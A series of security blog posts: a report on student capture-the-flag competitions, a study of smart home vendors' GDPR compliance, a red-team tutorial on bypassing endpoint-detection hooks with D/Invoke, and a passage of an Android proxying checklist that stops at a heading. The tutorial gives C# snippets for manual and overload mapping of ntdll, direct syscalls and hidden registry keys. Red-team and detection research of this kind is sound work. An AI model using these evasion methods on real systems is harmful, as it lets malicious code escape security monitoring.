Capture the Flag is most known as a game you used to play when you were kids. The field is divided into two camps, and the goal of your team is to steal the opponent’s flag and bring it to your own camp. Although that version of CTF is a lot of fun, the context in Cyber Security is slightly different. In a security CTF, flags can be stored on a vulnerable webserver, compiled into malicious executables, or encrypted using flawed cryptography. Teams then need to solve the various challenges using very broad skills to get the flag and score the points. 

CTFs have been very popular in the information security field for a long time – the DefCon CTF has been organized since 1996! – and are a great way to learn new skillsets, hang out with friends and colleagues and generally have a great time. The rush of finally getting that flag after hours (or days) or work really gets the adrenaline flowing. 😉  

CTFs are very popular as well. If you want, you can play one almost each week(end), often even multiple CTFs are running at the same time! For an overview of all CTFs, you can take a look at ctftime.org

Why do we organize ‘yet another CTF’? 

With a CTF being organized every week, why would we want to add yet another one? Well, the goal of our CTFs is quite different than a typical CTF. Most CTFs act as a competition for experienced security professionals, where incredibly skilled hackers show off their skills and take home the prizes. When we started organizing the first CTF in Belgium in 2015, there was just one goal: Get more students into the information security community. 

It’s no secret that the industry is desperately searching for more motivated people to join us, and positions often stay vacant for a long time. Universities and colleges often offer security courses, but the amount of students that actually end up joining the information security sector is rather low.  

With our CTF, we want to show students that: 

  • Hacking is fun (Who doesn’t like breaking stuff?) 
  • General computer skills and the right attitude can take you very far 
  • Even though it looks like a niche market, the cyber security field is very broad with many different aspects 

As our target audience, we chose all graduating students from local colleges and universities, as they will most likely be choosing a career after graduating and it would be nice if we can push them into our direction 😎

But this ain’t no ordinary CTF 

To reach our goal, we’ve created the Challenge in Belgium. We chose for a jeopardy-style CTF (as opposed to an attack/defense style) to keep the entry level low and give us the possibility to introduce a wide range of challenges to students.  

A participant at the Rumble 2019 life-event

While the core of both the Challenge and the Rumble is a CTF, there’s a little bit more to it to accommodate these sub goals. 

The first one is probably the easiest. Each year, we contact everyone we know in the Belgian/German infosec field and ask if they want to create a challenge. By outsourcing challenge creation, we can both shine a spotlight on talented individuals, as make sure that there is a very wide range of challenges to solve. 

Testing social skills is quite difficult for a CTF, as contestants typically sit behind their laptop screen for the entirety of the competition, and don’t really have to interact with other contestants or the organizers. To add this aspect to our event, we came up with the concept of challenges created by our sponsors. For these challenges, the qualifying teams have to face a panel of experts where they have to solve problems interactively. We’ve had live forensics investigations, incident response roll-playing, debates on the pros/cons of a cashless society, and calling up people to social engineer them into giving you valuable information.  

These challenges also automatically allow students and future employers to interact, which is a double win. 

Expanding to Germany 

After 6 years, the Cyber Security Challenge in Belgium is reaching over 700 students from more than 30 schools and the Challenge is even used as a preselection for the Belgian team for the European Cyber Security Challenge, organized by ENISA. Due to this success  and the interest of the industry, NVISO launched a sister event in Germany in 2019, called the Cyber Security Rumble. With the focus on mainly German academic students, the event was set up in cooperation with RedRocket (a famous German CTF team), the University of Bonn-Rhein-Sieg, SANS, and the German Federal Office for Information Security. The collaboration between these parties already shows that the goal remains to have the CTF driven by the community, and not by a single company.  

Even though the Challenge in Belgium had been organized successfully for quite a few years, it was still a gamble to see if Germany was as receptive to the students-only concept. Luckily, the first year managed to reach 300 participants in the qualifier rounds, from which 13 teams made it into the finals.  

The Challenge and Rumble in 2020 

The organization of the latest edition of the Cyber Security Challenge & Rumble was, as with all other events in 2020, defined by the COVID pandemic. While we love the interaction we have with the students during each edition, it was clear that we had to move to an online-only event to make sure everyone can stay safe. 

For the Challenge in Belgium, we decided to open the finals CTF to all the students that would have qualified for our computer-less CTF, and once again the top 12 teams would continue on day 2 with interactive challenges, this time in an online format. The online format took a lot more work on the day itself, as we needed to make sure everyone was joining (and leaving 😉) the correct meeting rooms. Discord allowed us to interact directly with students in case there were issues or questions, and also helped to still have a relaxed atmosphere in the general channels. The second day ended with an online prize ceremony, where all top 12 teams received their prizes, such as a trip to DefCon Las Vegas, a SANS course and much more.  

The German Rumble, in turn, was a full two-day online event organized on Halloween and welcomed more than 470 active teams, both German academic teams as well as international teams. By also communicating with the participants via a Discord chat, the players could get in contact with the sponsors that created the challenges and to interact with other participants about the challenges. Moreover, a scoreboard showed the progress and listing of the teams so that the speed and team spirit was cheered up a little more. Also the Rumble was rounded off with a prize ceremony, in which a representative of SANS announced the prizes.  

Tweet from the Rumble during it’s online prize ceremony

The challenges we still face each year 

There are various challenges and questions that pop up each year. While we don’t have a solid answer on all of them, we still want to share them, and any input in the comments is of course appreciated! 

Reaching students 

Although both the Challenge and the Rumble have grown in popularity, it’s a very large effort each time to reach all the students. We have to actively communicate with professors, schools and student unions to make sure students participate, often even visiting schools and presenting our challenge in security-focussed courses.  

Keeping the competition fair for everyone 

With such awesome prizes on the line, there’s always the possibility of teams collaborating, sharing solutions or flags. This is something that’s hard to prevent, although we do have various technical checks in place to detect weird behaviour. Additionally, we try to rely on the schools to do the right thing. Some schools even organize a small on-campus event during the qualifiers so that teams can be in the same room. However, through our good connections with the relevant professors, we can be sure that students are behaving and that we don’t have to fear dishonest collaboration. 

A participant in this year’s online Challenge 

Keeping it students only 

Another issue that regularly pops up is how we define a student. For example: Can PhD students participate? Technically they are students, with a valid student card. In practice, they would have a huge advantage over other students. Similarly, what if someone who has been in the industry for many years decides to join an online course at a registered university/college? Can they join? The hardest part here is being consistent while also being fair to everyone involved… 

NVISO as the common organizer

With our efforts to organize these great initiatives and thus to enhance the Cyber Security Communities in both countries, we are constantly supporting cross border activities. Both can learn from each other, are in constant communication and help to drive individual events to their success. We’re happy that both events can reach a substantial number of students and that we create interactivity between Belgium and Germany.  

Come join us! 

If you’re a cyber security specialist in Belgium or Germany, we’d love your help in creating challenges. It’s a great way to show your skills and connect with other challenge creators, sponsors and of course the awesome organizing team.  

And of course, if you’re still a Belgian/German student, don’t hesitate and sign up for either the Challenge or Rumble and take home some of the awesome prizes. 😊 

If you are not convinced yet, check out our after movies and catch a glimpse of the sphere of the last years: 

After movie Cyber Security Challenge Belgium

After movie Cyber Security Rumble Germany

Stay tuned for the events in 2021 and for exciting and fun challenges to crack!   

About the authors

This article was jointly written by:

  • Annika ten Velden, Operations Manager
  • Marina Hirschberger, Senior Consultant
  • Jeroen Beckers, Mobile security expert

They are all working at NVISO and are actively contributing to the organization of the events. While Annika and Jeroen are taking care of the Challenge in Belgium, Marina is part of the organization team of the Rumble in Germany. 

Smart Home Devices: assets or liabilities? – Part 2: Privacy

30 November 2020 at 09:52

TL;DR – Part two of this trilogy of blog posts will tackle the next big topic when it comes to smart home devices: privacy. Are these devices doubling as the ultimate data collection tool, and are we unwittingly providing the manufacturers with all of our private data? Find out in this blog post!

This blog post is part of a series – you can read part 1 here, and keep an eye out for the next part too!

Security: ✓ – Privacy: ?

In my previous blog post, I gave some insights into the security level provided by a few Smart Home environments that are currently sold on the European market. In conclusion, I found that the security of these devices is often a hit or miss and the lack of transparency around security means it can be quite difficult for the consumer to choose the good devices as opposed to some of the bad apples. There is one major topic missing from it though: even if a device is secure, how well does it protect the user’s privacy?

Privacy concerns

It turns out that this question is not unjustified: just like the security concerns surrounding smart home devices, privacy concerns are at least equally present, or maybe even more so. The fear that our own house is spying on us, is something that should be prevented by transparency and strong data subject rights.

These data subject access rights might have already been there on paper for a long time, but it’s never been easy to enforce them in practice. I strongly recommend looking at this paper by Jef Ausloos and Pierre Dewitte that shows just how difficult it used to be to get a data controller to comply with existing regulation.

Does this mean that there is no hope? Well, not exactly. Since then, the GDPR has come into effect. Even though it might still be too early to get concrete results, there have been some developments moving into the right direction. Just a few months ago, in July 2020, the EU-US privacy shield was deemed invalid after a ruling by the Court of Justice of the EU in a case brought up by Max Schrems’ NGO ‘noyb’ (‘none of your business’). This decision means that data transfers from the EU to the US are subject to the same requirements as transfers to any other country outside of the EU.

Existing regulation in Europe

So, which laws are there that protect our privacy anyways? To start with the basics, the European Convention of Human Rights and the Charter of Fundamental Rights of the European Union lay the groundwork for every individual’s right to privacy in their Article 8 and Article 7 respectively. These articles state that: “Everyone has the right to respect for his private and family life, his home and his correspondence.”.

On top of these, there used to be Directive 95/46/EC, which outlined the requirements each EU member state had to implement into their national privacy regulation. However, each member state could implement these requirements at their own discretion, which led to a lot of diverging laws between EU member states. The directive was eventually revoked for GDPR to take its place.

The General Data Protection Regulation (GDPR) is the current regulation that harmonises the privacy regulation for all EU member states. Its well-known new provisions enable data subjects to more effectively enforce their rights and protects the privacy of all people within the EU; or at least it does so on paper.

From paper to practice

Aside from testing the security of each device, I decided to also include some privacy tests in the scope of my assessments. For more information on the choice of devices, make sure to check out my previous blog post!

For each device, I added privacy-related tests in two major fields:

  • privacy policies: I verified if, for each device, the privacy policy contained all the relevant information it should have according to GDPR;
  • data subject access rights: I contacted each vendor’s privacy department with a generic data subject access request, asking them to give me a copy of the personal data they held about me.

Privacy policies: all or nothing

The first step in checking the completeness of a privacy policy, is finding out where it is stored – if it even exists. In many cases, finding a privacy policy was easy, but finding the right one was a different story. Many vendors had multiple versions of the policy, sometimes different editions for the USA and the EU, and other times they simply excluded everything from their scope except the website – not very useful for this research.

The privacy policies showed the exact same phenomenon as I already saw in the security part of the research: if they were compliant on one part, usually they put in a good attempt to be compliant across the board. The opposite was also true: if a policy was incomplete, it often didn’t contain any of the required info as per the GDPR. The specific elements that need to be included in a privacy policy under GDPR are outlined in Article 13. The table below shows which of the policies adhered to which provisions in this article.

The results of checking each privacy policy
(Image credit: see “Reference” below)

Access requests: hide & seek

In the exact same way that it can be difficult to locate a privacy policy, it can sometimes be a real hassle to find the correct contact details to submit a data access request. Most vendors with a compliant privacy policy had either an email address of the DPO, or a link to an online form listed as a means of contact. In case I could not locate the correct contact details, I would attempt to reach them a single time by mailing to their general information address or contacting their customer support. I would also send out a single reminder to each vendor if they had not replied after one month.

What it feels like trying to reach the DPO of many manufacturers
(Image credit: imgflip.com)

Surprisingly, many vendors straight up ignored the request: one third (!) of requests went unanswered. Those that did reply, usually responded quite quickly after receiving the initial request. With a few exceptions that requested deadline extensions or simply claimed to “have never received the initial email” after being sent a reminder.

One third of the sent requests went unanswered
(Image credit: see “Reference” below)

Most importantly, the number of satisfactory replies after running this experiment for over 5 months was disappointingly low. Often, either the answers to the questions in the request or the returned data itself were strongly lacking. In some cases, no satisfying answer was given at all. In one or two notable instances, however, the follow up of the privacy department was excellent and an active effort was made to comply with the request as well as possible.

The aftermath

From these results, it’s clear that there are some changes to be seen in the privacy landscape. Here and there, companies are putting in an effort to be GDPR compliant, with varying effectiveness. However, just like with security, there is a major gap in maturity between the different vendors: the divide between those that attempt to be compliant and those that are non-compliant is massive. Most notably, the companies that ignored access requests or had outdated privacy policies were those that might deem themselves too small to be “noticed” by authorities or are simply located too far from the EU to care about it. This suggests there is a need for more active enforcement, also on companies incorporated outside of the EU, and more transparency surrounding fines and penalties imposed on those that are non-compliant.

Even though privacy compliance is going in the right direction, there is still a lot of progress to be made in order to get an acceptable baseline of compliance across the industry. Active enforcement and increased transparency surrounding fines and penalties is needed to motivate organisations to invest in their privacy and data protection maturity.

Stay tuned for Part 3 of this series, in which I’ll be discussing some options for dealing with the issues I found during this research.


This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Dynamic Invocation in .NET to bypass hooks

20 November 2020 at 08:45


TLDR: This blogpost showcases several methods of dynamic invocation that can be leveraged to bypass inline and IAT hooks. A proof of concept can be found here: https://github.com/NVISO-BE/DInvisibleRegistry

A while ago, a noticeable shift in red team tradecraft happened. More and more tooling is getting created in C# or ported from PowerShell to C#.
PowerShell became better shielded against offensive tradecraft thanks to a variety of changes, ranging from AMSI (Anti Malware Scan Interface) to Script Block logging and more.
One of the cool features of C# is the ability to call the Win32 API and manipulate low-level functions like you normally would in C or C++
The process of leveraging these API functions in C# is dubbed Platform Invoking (P/invoke for short). Microsoft made this possible thanks to the System.Runtime.InteropServices namespace in C#. All of which is being “managed” by the CLR (Common Language Runtime). The graphic below shows how using P/Invoke, you can bridge the gap between unmanaged and managed code.

Consuming Unmanaged DLL Functions | Microsoft Docs
How P/invoke bridges the cap between managed and unmanaged code.
source – https://docs.microsoft.com/en-us/dotnet/framework/interop/consuming-unmanaged-dll-functions

There is an operational (from an offensive point of view) drawback to leveraging .NET as well, however. Since the CLR is responsible for the translation between .NET to machine-readable code, the executable is not directly translated into this code. This means that the executable stores its entire codebase in the assembly, and is thus very easily reverse-engineered.

On top of assemblies being reversed engineered, we are also moving more and more into an EDR (Endpoint Detection and Response) world. Organizations are (thankfully) increasing their (cyber)security posture around the globe, making the lives of operators harder, which is a good thing. As Cybersecurity consultants it is our job to help organizations increase their cybersecurity posture so we are glad that this is moving in the right direction.

EDR’s catch offensive tradecraft, even when executed in memory (without touching disk, also commonly referred to as “fileless”) by hooking into processes and subverting their execution on certain functions. This allows the EDR to inspect what is happening, and if it likes what it sees, the EDR will let the function call pass and normal execution of the program will be achieved. @CCob posted a very nice blog post series about this concept, and how to bypass the hooks. A good EDR will “hook” in the lowest level possible,this would be ntdll.dll (this dll is responsible of making system calls to the Windows kernel). The image below is a good example of how EDR’s could work.

EDR Observations | RE & Sec Blog
how EDR’s can hook ntdll calls to prevent malware execution
source – http://christopher-vella.com/2020/08/21/EDR-Observations.html

There are two main methods an EDR uses to do its hooking, ironically, this is also how most rootkits operate: IAT hooking and Inline hooking (also known as splicing).

IAT stands for Import Address Table, you could compare the IAT with a phone book. Every executable file has this phone book where it can look up the numbers of his/her friends (functions it needs).
This phonebook can be tampered with, an EDR could change an entry in this dictionary to point to it. Below you can see a nice diagram of how IAT hooking could work.
In order for this diagram to make sense, you’ll have to think of the EDR as “malicious code”:

In this example, a program that wants to call a message box. The program will look up the message box’s number (address) in his phone book so they can call it.
Little does the program know, that someone actually replaced the phone number (address) so whenever they call message box, they actually call the EDR instead!
The EDR will pick up the phone, listen to the message (function call), and if the EDR likes the message, will tell the program the real phone number of message box so the program can call message box.

Inline hooking could be compared with an intruder holding a gun to the head of the friend our program wants to call.

splicing illustration courtesy of “Learning malware Analysis” by Monnapa K A

With inline hooking, the program has the correct number (address) of its friend (function). The program will call its friend and its friend will answer the call.
Little does the program know, that its friend has actually been taken hostage and the call is on speaker. The intruder tells the friend what to say a certain phrase (execute some instructions) and afterward resume the conversation as if nothing happened.

These two methods can cause serious issues for operators (in the case of defensive hooks) and defenders (in the case of offensive hooks).
From an offensive perspective, there are some bypasses you can leverage to get around these function hooks. Firewalker by MDSec comes to mind and Sharpblock by @CCob. Or, the ultimate bypass. use system calls directly.

Another interesting project is the Sharpsploit project, aimed to be used as a library to facilitate offensive C# tradecraft, much like PowerSploit was for PowerShell back in the day. The downside of Sharpsploit however, is that the compiled dll is considered malicious, so if you use sharpsploit as a dependency for your program, you’ll immediately be screwed by AV.
Part of Sharpsploit however, is dynamic invocation (also known as D/invoke). This is (in my opinion) the most interesting part of the entire Sharpsploit suite. It allows operators to invoke API’s leveraged by P/Invoke, but instead of static imports, it does it dynamically! This means IAT hooking is completely bypassed since dynamically invoking functions will not create an entry in the executables import table. As a result analysts and EDR’s alike will not be able to tell what your majestic program does, just by looking at your import table. TheWover wrote a very nice blog post about it, I highly recommend reading it.

Additionally, a NuGet package was released by TheWover and what is great about this NuGet package is that it can be directly used as a library and is NOT considered malicious. The cool thing about this package is that it contains structures and functions that would otherwise have to be manually defined by the programmer. If this does not make sense to you right now, allow me to illustrate with an example I created a few days ago:
https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0#file-dinjectqueuerapc-cs

Then, I recreated the same PoC, with the NuGet

The codebase shrunk from 731 lines of code to just 38. That is what makes the D/Invoke NuGet the best invention ever for offensive .NET development.
The NuGet is still a work in process, but its ultimate goal is to be a full replacement for P/Invoke. If you want to help out, feel free to submit a pull request!

I’m confident that this library can become very big, through the power of open source!

Leveraging D/Invoke to bypass hooks and the revival of the invisible reg key.

Now that the concepts of hooking and dynamic invocation are clear, we can dive into bypassing hooks using D/Invoke.
For inspiration and to make this blog post useful, I’ve decided to create a proof of concept based on some old research from the folks over at Specterops.
In their research, they took even older research of Mark Russinovich and turned it into an offensive proof of concept. Mark released a tool called RegHide back in 2005.
He discovered that you could prepend a null byte when creating a new registry key using Ntcreatekey. When a null byte prepends the registry key, the interpreter sees this as a string termination (in C, strings get terminated with a null byte). This results in the registry accepting the new reg key, but unable to display it properly. This gives defenders already a nice indication something is definitely fishy.

Image for post
Regedit will show an error when trying to display a key value with a null character in its name.

In my proof of concept, I ported their PowerShell into C#, leveraging the power of D/invoke and its NuGet.
I’ve submitted a pull request for the D/invoke project, where I added all the necessary structures and delegates (along with some others, such as QueueUserAPC process injection).
However, as I wanted to create this blogpost already, I actually coded the necessary structs into my PoC as well. making it compatible with the current NuGet package of D/invoke.
The PoC can be found here:
https://github.com/NVISO-BE/DInvisibleRegistry

usage of the PoC – DinvisbleRegistry



There are three methods of invocation coded into the PoC, all the methods are fully implemented even though they could have been merged into one big function.
The reason why I took the time to write the code to its fullest, is because I wanted to show the concepts behind the different approaches an operator can take to leverage D/Invoke to bypass hooking.

Method 1: “classic” dynamic invoke.

When specifying the -n flag and all other required parameters the PoC will create a new (hidden, if you use the -h flag) registry key in the requested hive using the traditional D/Invoke methodology.
This method will bypass IAT hooking as the functions are being called dynamically, thus not showing up in the IAT.

D/Invoke works like this, you first need to create the signature of the API call you are trying to do (unless it’s already in the D/Invoke Nuget) and the corresponding Delegate function:

API signature

public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
STRUCTS.ACCESS_MASK desiredAccess,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
{
object[] funcargs =
{
keyHandle,desiredAccess,objectAttributes
};
DInvoke.Data.Native.NTSTATUS retvalue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref funcargs);
keyHandle = (IntPtr)funcargs[0];
return retvalue;
}

Corresponding delegate:

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
STRUCTS.ACCESS_MASK desiredAccess,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

As you can see in the API signature, you are calling the DynamicAPIInvoke function and passing it the delegate of the function.

Method 2: “Manual Mapping”

A trick some threat actors and malware strains use is the concept of manual mapping. TheWover explains manual mapping in his blog post as follows:

DInvoke supports manual mapping of PE modules, stored either on disk or in memory. This capability can be used either for bypassing API hooking or simply to load and execute payloads from memory without touching disk. The module may either be mapped into dynamically allocated memory or into memory backed by an arbitrary file on disk. When a module is manually mapped from disk, a fresh copy of it is used. That way, any hooks that AV/EDR would normally place within it will not be present. If the manually mapped module makes calls into other modules that are hooked, then AV/EDR may still trigger. But at least all calls into the manually mapped module itself will not be caught in any hooks. This is why malware often manually maps ntdll.dll. They use a fresh copy to bypass any hooks placed within the original copy of ntdll.dll loaded into the process when it was created, and force themselves to only use Nt* API calls located within that fresh copy of ntdll.dll. Since the Nt* API calls in ntdll.dll are merely wrappers for syscalls, any call into them will not inadvertently jump into other modules that may have hooks in place

Manual mapping is done in the PoC when you specify the -m flag and the code looks like this

First, map the library you are using, the lower you go, the less chance of hooks further down the call tree. Whenever you can use ntdll.dll.

DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");

Next, create the delegate for the function you are trying to call, if it is not yet in D/Invoke, else you can just leverage the NuGet.

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
STRUCTS.ACCESS_MASK desiredAccess,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

Next, create your function parameters and an array to store them in

IntPtr keyHandle = IntPtr.Zero;
STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS;
STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
oa.Length = Marshal.SizeOf(oa);             
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;             
oa.objectName = oaObjectName;             
oa.SecurityDescriptor = IntPtr.Zero;           
oa.SecurityQualityOfService = IntPtr.Zero;            
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
object[] ntOpenKeyParams =
{
    keyHandle,desiredAccess,oa
};

Finally, call D/invokes CallMappedDLLModuleExport to call the function from the manually mapped DLL.

retValue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(mappedDLL.PEINFO, mappedDLL.ModuleBase, "NtOpenKey", typeof(DELEGATES.NtOpenKey), ntOpenKeyParams, false);

In the case of ntdll, the last parameter of CalledMappedDLLModuleExport is false, this is because ntdll does not have a DllMain method. Setting it to true would cause panic as you are trying to access memory that does not exist, crashing the program.


Method 3: OverloadMapping (my personal favorite)

TheWover explains Overloadmapping as follows:

In addition to normal manual mapping, we also added support for Module Overloading. Module Overloading allows you to store a payload in memory (in a byte array) into memory backed by a legitimate file on disk. That way, when you execute code from it, the code will appear to execute from a legitimate, validly signed DLL on disk.
A word of caution: manual mapping is complex and we do not guarantee that our implementation covers every edge case. The version we have implemented now is serviceable for many common use cases and will be improved upon over time. Additionally, manual mapping and syscall stub generation do not currently work in WOW64 processes.

Method 2 and 3 are largely the same in implementation, the only variation is you call the overload manual map method, and you do not have to map to memory anymore

        DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = DInvoke.ManualMap.Overload.OverloadModule(@"C:\Windows\System32\ntdll.dll");

The rest of the implementation remains the same as in method 2.

If you want to see which process got used you can get it using the PE_MANUAL_MAP DecoyModule call:

Console.WriteLine("Decoy module is found!\n Using: {0} as a decoy", mappedDLL.DecoyModule);

Method 4: System calls

Disclaimer: This method is currently a bit “broken”, as a result, you might not experience the result you are looking for. This is also the reason why this method is currently NOT implemented in the PoC I would advise not using this method until a later release of D/Invoke.

D/Invoke has provided an API to dynamically get system calls as well. The steps to generate system calls are explained next.

Create your delegate (should it not already exist):

[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
STRUCTS.ACCESS_MASK desiredAccess,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

Create a IntPtr to store your syscall pointer and fill in the pointer using the GetSyscallStub function

IntPtr syscall = IntPtr.Zero;
syscall  = DInvoke.DynamicInvoke.Generic.GetSyscallStub("NtOpenKey");

Create a delegate of the call you want to make that uses the syscall through the use of our dear friend Marshal

DELEGATES.NtOpenKey syscallNtOpenKey = (DELEGATES.NtOpenKey)Marshal.GetDelegateForFunctionPointer(syscall, typeof(DELEGATES.NtOpenKey));

Finally, make the call 🙂

retValue = syscallNtOpenKey(ref keyHandle, desiredAccess, ref oa);

Conclusion

I hope this blogpost has shed some light on the different approaches an operator could take in order to bypass EDR hooks for both IAT and inline hooking.
Feel free to contribute to the D/Invoke project by submitting a pull request! We will greatly appreciate your efforts! The D/Invoke GitHub project can be found here:
https://github.com/TheWover/DInvoke
The proof of concept can be found here:
https://github.com/NVISO-BE/DInvisibleRegistry

About the author

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course
He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
You can find Jean-François on LinkedIn , Twitter , GitHub and on Hack The Box.

Proxying Android app traffic – Common issues / checklist

19 November 2020 at 09:52

During a mobile assessment, there will typically be two sub-assessments: The mobile frontend, and the backend API. In order to examine the security of the API, you will either need extensive documentation such as Swagger or Postman files, or you can let the mobile application generate all the traffic for you and simply intercept and modify traffic through a proxy (MitM attack).

Sometimes it’s really easy to get your proxy set up. Other times, it can be very difficult and time consuming. During many engagements, I have seen myself go over this ‘sanity checklist’ to figure out which step went wrong, so I wanted to write it down and share it with everyone.

In this guide, I will use PortSwigger’s Burp Suite proxy, but the same steps can of course be used with any HTTP proxy. The proxy will be hosted at 192.168.1.100 on port 8080 in all the examples. The checks start very basic, but ramp up towards the end.

TL;DR;

Update: Sven Schleier also created a blogpost on this with some awesome visuals and graphs, so check that out as well!

Setting up the device

First, we need to make sure everything is set up correctly on the device. These steps apply regardless of the application you’re trying to MitM.

Is your proxy configured on the device?

An obvious first step is to configure a proxy on the device. The UI changes a bit depending on your Android version, but it shouldn’t be too hard to find.

Sanity check
Go to Settings > Connections > Wi-Fi, select the Wi-Fi network that you’re on, click Advanced > Proxy > Manual and enter your Proxy details:

Proxy host name: 192.168.1.100
Proxy port: 8080

Is Burp listening on all interfaces?

By default, Burp only listens on the local interface (127.0.0.1) but since we want to connect from a different device, Burp needs to listen on the specific interface that has joined the Wi-Fi network. You can either listen on all interfaces, or listen on a specific interface if you know which one you want. As a sanity check, I usually go for ‘listen on all interfaces’. Note that Burp has an API which may allow other people on the same Wi-Fi network to query your proxy and retrieve information from it.

Sanity check
Navigate to http://192.168.1.100:8080 on your host computer. The Burp welcome screen should come up.

Solution
In Burp, go to Proxy > Options > Click your proxy in the Proxy Listeners window > check ‘All interfaces’ on the Bind to Address configuration

Can your device connect to your proxy?

Some networks have host/client isolation and won’t allow clients to talk to each other. In this case, your device won’t be able to connect to the proxy since the router doesn’t allow it.

Sanity Check
Open a browser on the device and navigate to http://192.168.1.100:8080 . You should see Burp’s welcome screen. You should also be able to navigate to http://burp in case you’ve already configured the proxy in the previous check.

Solution
There are a few options here:

  • Set up a custom wireless network where host/client isolation is disabled
  • Host your proxy on a device that is accessible, for example an AWS ec2 instance
  • Perform an ARP spoofing attack to trick the mobile device into believing you are the router
  • Use adb reverse to proxy your traffic over a USB cable:
    • Configure the proxy on your device to go to 127.0.0.1 on port 8080
    • Connect your device over USB and make sure that adb devices shows your device
    • Execute adb reverse tcp:8080 tcp:8080 which sends all traffic received on <device>:8080 to <host>:8080
    • At this point, you should be able to browse to http://127.0.0.1:8080 and see Burp’s welcome screen

Can you proxy HTTP traffic?

The steps for HTTP traffic are typically much easier than HTTPS traffic, so a quick sanity check here makes sure that your proxy is set up correctly and reachable by the device.

Sanity check
Navigate to http://neverssl.com and make sure you see the request in Burp. Neverssl.com is a website that doesn’t use HSTS and will never send you to an HTTPS version, making it a perfect test for plaintext traffic.

Solution

  • Go over the previous checks again, something may be wrong
  • Burp’s Intercept is enabled and the request is waiting for your approval

Is your Burp certificate installed on the device?

In order to intercept HTTPS traffic, your proxy’s certificate needs to be installed on the device.

Sanity check
Go to Settings > Security > Trusted credentials > User and make sure your certificate is listed. Alternatively, you can try intercepting HTTPS traffic from the device’s browser.

Solution
This is documented in many places, but here’s a quick rundown:

  • Navigate to http://burp in your browser
  • Click the ‘CA Certificate’ in the top right; a download will start
  • Use adb or a file manager to change the extension from der to crt
    • adb shell mv /sdcard/Download/cacert.der /sdcard/Download/cacert.crt
  • Navigate to the file using your file manager and open the file to start the installation

Is your Burp certificate installed as a root certificate?

Applications on more recent versions of Android don’t trust user certificates by default. A more thorough writeup is available in another blogpost. Alternatively, you can repackage applications to add the relevant controls to the network_security_policy.xml file, but having your root CA in the system CA store will save you a headache on other steps (such as third-party frameworks) so it’s my preferred method.

Sanity check
Go to Settings > Security > Trusted credentials > System and make sure your certificate is listed.

Solution
In order to get your certificate listed as a root certificate, your device needs to be rooted with Magisk

  • Install the client certificate as normal (see previous check)
  • Install the MagiskTrustUser module
  • Restart your device to enable the module
  • Restart a second time to trigger the file copy

Alternatively, you can:

  • Make sure the certificate is in the correct format and copy/paste it to the /system/etc/security/cacerts directory yourself. However, for this to work, your /system partition needs to be writable. Some rooting methods allow this, but it’s very dirty and Magisk is just so much nicer. It’s also a bit tedious to get the certificate in the correct format.
  • Modify the networkSecurityConfig to include user certificates as trust anchors (see further down below). It’s much nicer to have your certificate as a system certificate though, so I rarely take this approach.

Does your Burp certificate have an appropriate lifetime?

Google (and thus Android) is aggressively shortening the maximum accepted lifetime of leaf certificates. If your leaf certificate’s expiration date is too far ahead in the future, Android/Chrome will not accept it. More information can be found in this blogpost.

Sanity check
Connect to your proxy using a browser and investigate the certificate lifetime of both the root CA and the leaf certificate. If they’re shorter than 1 year, you’re good to go. If they’re longer, I like to play it safe and create a new CA. You can also use the latest version of the Chrome browser on Android to validate your certificate lifetime. If something’s wrong, Chrome will display the following error: ERR_CERT_VALIDITY_TOO_LONG

Solution
There are two possible solutions here:

  • Make sure you have the latest version of Burp installed, which reduces the lifetime of generated leaf certificates
  • Make your own root CA that’s only valid for 365 days. Certificates generated by this root CA will also be shorter than 365 days. This is my preferred option, since the certificate can be shared with team members and be installed on all devices used during engagements.

Setting up the application

Now that the device is ready to go, it’s time to take a look at application specifics.

Is the application proxy aware?

